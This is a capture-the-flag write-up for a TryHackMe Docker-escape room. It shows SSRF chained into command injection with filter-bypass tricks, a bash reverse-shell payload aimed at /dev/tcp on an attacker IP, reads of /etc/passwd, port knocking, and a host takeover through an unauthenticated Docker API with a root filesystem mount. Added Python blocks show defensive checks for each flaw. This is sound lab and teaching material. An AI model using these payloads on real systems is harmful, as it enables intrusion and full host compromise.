Room link: https://tryhackme.com/room/thegreatescape
Enum
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
22/tcp open ssh?
| fingerprint-strings:
| GenericLines:
|_ m6"<
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open http nginx 1.19.6
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-methods:
|_ Supported Methods: HEAD
| http-robots.txt: 3 disallowed entries
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt
|_http-trane-info: Problem with XML parsing of /evox/about
Port 80
Main page
/robots.txt
SSRF
Using the exif-util hint from robots.txt we find another endpoint that is vulnerable to SSRF techniques.
Sending the request to Burp, I tested a range of ports to see what was reachable internally.
Intruder setup
Results
I found port 8080 to be open internally.
Looking at robots.txt again I noticed another hint.
# Disallow: /exif-util
Disallow: /*.bak.txt$
/exif-util.bak.txt
This file shows a new endpoint to play with. This must be the call to the internal web app. Let’s call it to see the response.
http://api-dev-backup:8080/exif
Calling the public endpoint with a url pointing at the internal service on port 8080, and passing that internal service its own URL parameter, gave a different response for banned words.
http://10.10.31.233/api/exif?url=http://api-dev-backup:8080/exif?url=/etc/passwd
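The endpoint above takes an attacker-supplied url and fetches it from inside the network, which is what lets it reach api-dev-backup at all. The following is an added example of the check a fetcher like /api/exif should apply before making the request; it is not the room's code. It assumes a Python handler, and the hostname-to-address table is constructed so the block runs offline (a real deployment resolves with DNS, which the fallback does).

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed resolver table for the example. api-dev-backup is the internal
# service name from the writeup; the address given for it is made up.
FAKE_DNS = {
    "api-dev-backup": "172.18.0.3",
    "localhost": "127.0.0.1",
    "images.example.com": "1.2.3.4",   # stands in for a public host
}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve(host):
    """Resolve a hostname or IP literal to an ip_address, or None."""
    try:
        return ipaddress.ip_address(host)          # literal IPv4/IPv6
    except ValueError:
        pass
    if host in FAKE_DNS:
        return ipaddress.ip_address(FAKE_DNS[host])
    try:
        return ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return None


def check_fetch_url(url):
    """Return (ok, reason). Only public http(s) hosts on standard ports pass."""
    try:
        parts = urlparse(url)
        port = parts.port                          # raises on a bad port
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    ip = resolve(parts.hostname)
    if ip is None:
        return False, "host does not resolve"
    if not ip.is_global:
        return False, f"{parts.hostname} resolves to non-public {ip}"
    return True, f"ok ({ip})"


if __name__ == "__main__":
    for u in ("http://images.example.com/photo.jpg",
              "http://api-dev-backup:8080/exif?url=/etc/passwd",
              "http://localhost/", "/etc/passwd"):
        print(u, "->", check_fetch_url(u))
```

The check resolves once, so the fetch must connect to the address that was checked and must not follow redirects; otherwise a second lookup or a 302 can still land on the internal host.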
I quickly worked out we can use command injection here to get some results.
http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;ls -la
I was still blocked by the banned-word filter, so I tried a few tricks from here: https://book.hacktricks.xyz/linux-unix/useful-linux-commands/bypass-bash-restrictions
Then I was able to bypass the bad-word filter with a simple ''.
Using this technique I started to enum the system before I attempted to get a reverse shell.
Bypass chars
$IFS # Spaces
'' # Break a word up
Eg:
exif?url=;cat$IFS/etc/pas''swd
exif?url=;cat${IFS}/etc/pas''swd
Further testing and results.
Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;id
Response: uid=0(root) gid=0(root) groups=0(root)
Sent: http://10.10.183.57/api/exif?url=http://api-dev-backup:8080/exif?url=;hostname
Response: api-dev-backup
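The results above show why a banned-word filter on the url parameter is the wrong fix: the parameter is still spliced into a shell string, so any token the filter does not anticipate reaches the shell intact. This added example (not the room's code; it assumes the internal service wraps exiftool, which the page never confirms, and the denylist is constructed) puts the legacy pattern beside the hardened one: a fixed argv with the value as a single element and no shell.

```python
import shlex
import subprocess

# Constructed denylist; the room never shows the real banned-word list.
BANNED = ("/etc/passwd", "cat ", "bash", " ")


def denylist_allows(url_param):
    """The legacy check: reject when any banned substring is present."""
    return not any(word in url_param for word in BANNED)


def vulnerable_command(url_param):
    """What a concatenating handler hands to sh -c. Everything after ';'
    is parsed by the shell as a second command."""
    return f"exiftool -json {url_param}"


def safe_argv(url_param):
    """Hardened form: fixed argv, the value as one element. A leading '-'
    is rejected so the value cannot be read as a tool option."""
    if url_param.startswith("-"):
        raise ValueError("parameter may not start with '-'")
    return ["exiftool", "-json", url_param]


def quoted_for_shell(url_param):
    """If a shell cannot be avoided, quote the value so it stays one word."""
    return f"exiftool -json {shlex.quote(url_param)}"


def run_exiftool(url_param):
    """Run the hardened argv with shell=False; ';' and $IFS are inert."""
    return subprocess.run(safe_argv(url_param), capture_output=True,
                          text=True, timeout=15)


if __name__ == "__main__":
    for p in (";cat /etc/passwd", ";cat$IFS/etc/pas''swd"):
        print(repr(p), "passes denylist:", denylist_allows(p))
        print("  shell string:", vulnerable_command(p))
        print("  argv:        ", safe_argv(p))
```

With shell=False the operating system receives the argv list directly, so the string that defeated the denylist is delivered to exiftool as a file name rather than to a shell as commands.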
User
Doing some more enum on the main url showed some interesting results.
dirb http://10.10.16.111/ /usr/share/seclists/Discovery/Web-Content/common.txt
Curling the discovered path gives us the user flag.
Root (Docker Container)
I started to craft a payload that would work to bypass the word filter.
a="ba";b="sh";echo "$a$b -c '$a$b -i >& /dev/tcp/10.8.153.120/9999 0>&1'"
This also failed. Looking again, I worked out it's best to close the first command being sent.
Curl is the first command to run, so null that command with '';
Now enter any other command.
'';/bin/ba''sh -c "id"
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';id
Retrieved Content
----------------------------------------
uid=0(root) gid=0(root) groups=0(root)
After many attempts to get a reverse shell, I quickly realised it was not going to happen. I then started manual enumeration.
Knowing we were already root, I started there.
dev-note.txt
Hey guys,
Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.
Anyways, the password is fluffybunnies123
Cheers,
Hydra
We also note a git repo here. Let's enumerate that too.
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git log
Let's see the changes on the commit ids.
http://10.10.3.112/api/exif?url=http://api-dev-backup:8080/exif?url='';cd /root; git show 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Awesome! We get the flag and a hint to open a port for Docker TCP.
Port Knocking (root flag)
Ports to knock.
knock 10.10.3.112 42 1337 10420 6969 63000
Before
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
After
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
2375/tcp open docker
Now we have a new port open, time to connect and see what's on it.
Using the info here: https://book.hacktricks.xyz/pentesting/2375-pentesting-docker, it was easy to enum the target.
curl -s http://10.10.3.112:2375/version | jq
#or
docker -H 10.10.3.112:2375 version
docker -H 10.10.3.112:2375 images
REPOSITORY TAG IMAGE ID CREATED SIZE
exif-api-dev latest 4084cb55e1c7 7 months ago 214MB
exif-api latest 923c5821b907 7 months ago 163MB
frontend latest 577f9da1362e 7 months ago 138MB
endlessh latest 7bde5182dc5e 7 months ago 5.67MB
nginx latest ae2feff98a0c 8 months ago 133MB
debian 10-slim 4a9cd57610d6 8 months ago 69.2MB
registry.access.redhat.com/ubi8/ubi-minimal 8.3 7331d26c1fdf 8 months ago 103MB
alpine 3.9 78a2ce922f86 15 months ago 5.55MB
After trying a few images, I found one that let me log in with the host filesystem mounted inside the container.
docker -H 10.10.3.112:2375 run --rm -it -v /:/host/ nginx chroot /host/ bash
Now we can get the real root flag and complete the box.
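Two misconfigurations made the final step possible: the daemon listening on tcp 2375 with no TLS client authentication, and a container allowed to bind the host's / into itself. The block below is an added example of how a defender can check for both from the daemon side; it is not the room's code. The inspect records and daemon.json fragments are constructed, trimmed to the fields the checks read.

```python
import json

# Constructed docker inspect output (the real command prints far more);
# the "escape" record mirrors the -v /:/host/ run from the writeup.
SAMPLE_INSPECT = json.loads("""[
  {"Name": "/frontend",
   "HostConfig": {"Privileged": false, "Binds": null},
   "Mounts": []},
  {"Name": "/escape",
   "HostConfig": {"Privileged": false, "Binds": ["/:/host/"]},
   "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host/"}]},
  {"Name": "/agent",
   "HostConfig": {"Privileged": true,
                  "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
   "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
               "Destination": "/var/run/docker.sock"}]}
]""")

# Host paths that, once bind-mounted, give a container control of the host.
SENSITIVE_SOURCES = ("/", "/var/run/docker.sock", "/etc", "/root", "/proc", "/sys")


def mount_findings(container):
    """Reasons a single inspect record looks like an escape vector."""
    reasons = []
    if container.get("HostConfig", {}).get("Privileged"):
        reasons.append("privileged")
    for m in container.get("Mounts", []):
        if m.get("Type") == "bind" and m.get("Source") in SENSITIVE_SOURCES:
            reasons.append(f"bind {m['Source']} -> {m.get('Destination')}")
    return reasons


def risky_containers(inspect_list):
    """Map container name -> reasons, only for containers with a finding."""
    out = {}
    for c in inspect_list:
        reasons = mount_findings(c)
        if reasons:
            out[c["Name"].lstrip("/")] = reasons
    return out


def daemon_listens_without_tls(daemon_json):
    """True when daemon.json exposes a tcp:// listener without tlsverify."""
    cfg = json.loads(daemon_json)
    tcp = any(h.startswith("tcp://") for h in cfg.get("hosts", []))
    return tcp and not cfg.get("tlsverify", False)


if __name__ == "__main__":
    for name, reasons in risky_containers(SAMPLE_INSPECT).items():
        print(name, ":", ", ".join(reasons))
    print("2375 without TLS:",
          daemon_listens_without_tls('{"hosts": ["tcp://0.0.0.0:2375"]}'))
```

On a live host, `docker inspect $(docker ps -q)` prints the same JSON array shape and can be fed to risky_containers; the daemon check reads /etc/docker/daemon.json. A daemon that must be reachable over TCP should listen on 2376 with tlsverify and a client CA, so that reaching the port is not the same as holding root on the host.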